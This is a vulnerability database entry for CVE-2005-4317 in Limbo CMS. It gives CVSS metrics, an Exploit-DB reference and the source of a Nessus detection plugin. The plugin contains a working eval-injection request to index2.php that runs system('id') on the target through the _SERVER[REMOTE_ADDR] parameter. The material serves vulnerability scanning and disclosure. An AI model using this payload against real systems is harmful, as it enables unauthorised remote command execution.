Vulnerabilities > CVE-2005-4317 - Unspecified vulnerability in Limbo CMS Limbo CMS

047910
CVSS 6.8 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
limbo-cms
nessus
exploit available
NVD
Published: 2005-12-17
Updated: 2018-10-19

Summary

Limbo CMS 1.0.4.2 and earlier, with register_globals off, does not protect the $_SERVER variable from external modification, which allows remote attackers to use the _SERVER[REMOTE_ADDR] parameter to (1) conduct cross-site scripting (XSS) attacks in the stats module or (2) execute arbitrary code via an eval injection attack in the wrapper option in index2.php.

Vulnerable Configurations

Part Description Count
Application
Limbo_Cms
1

Exploit-Db

descriptionLimbo CMS 1.0.4 .2 index.php _SERVER[REMOTE_ADDR] Parameter XSS. CVE-2005-4317. Webapps exploit for php platform
idEDB-ID:26836
last seen2016-02-03
modified2005-12-14
published2005-12-14
reporterrgod
sourcehttps://www.exploit-db.com/download/26836/
titleLimbo CMS 1.0.4.2 - index.php _SERVERREMOTE_ADDR Parameter XSS

Nessus

NASL familyCGI abuses
NASL idLIMBO_MULTIPLE_FLAWS.NASL
descriptionThe remote host is running Limbo CMS, a content-management system written in PHP. The remote version of this software is vulnerable to several flaws including : - If register_globals is off and Limbo is configured to use a MySQL backend, then a SQL injection is possible due to improper sanitization of the
last seen2020-06-01
modified2020-06-02
plugin id20824
published2006-01-30
reporterThis script is Copyright (C) 2006-2018 Josh Zlatin-Amishav
sourcehttps://www.tenable.com/plugins/nessus/20824
titleLimbo CMS Multiple Vulnerabilities
code
#
# This script was written by Josh Zlatin-Amishav <josh at ramat dot cc>
# GPLv2
#

include("compat.inc");

if(description)
{
 script_id(20824);
 script_version ("1.14");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2005-4317", "CVE-2005-4318", "CVE-2005-4319", "CVE-2005-4320");
 script_bugtraq_id(15871);
 
 script_name(english:"Limbo CMS Multiple Vulnerabilities");
 script_summary(english:"Checks for multiple vulnerabilities in Limbo");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
numerous vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Limbo CMS, a content-management system
written in PHP. 

The remote version of this software is vulnerable to several flaws
including :

  - If register_globals is off and Limbo is configured to use 
    a MySQL backend, then a SQL injection is possible due to 
    improper sanitization of the '_SERVER[REMOTE_ADDR]' 
    parameter.

  - The installation path is revealed when the 'doc.inc.php', 
    'element.inc.php', and 'node.inc.php' files are reqeusted 
    when PHP's 'display_errors' setting is enabled.

  - A cross-site scripting attack is possible when the Stats 
    module is used due to improper sanitization of the 
    '_SERVER[REMOTE_ADDR]' parameter.

  - Arbitrary PHP files can be retrieved via the 
    'index2.php' script due to improper sanitation of the 
    'option' parameter.

  - An attacker can run arbitrary system commands on the 
    remote system via a combination of the SQL injection 
    and directory transversal attacks." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/419470" );
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6b3b5f19" );
 script_set_attribute(attribute:"solution", value:
"Apply the patch from the references above." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/30");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/12/14");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2006-2020 Josh Zlatin-Amishav");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}

# The script code starts here

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80, embedded:TRUE);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);


http_check_remote_code_ka(
  extra_dirs:"",
  check_request:string("/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1"),
  check_result:"uid=[0-9]+.*gid=[0-9]+.*",
  command:"id",
  port:port,
  xss: 1, sql_inject: 1
);

References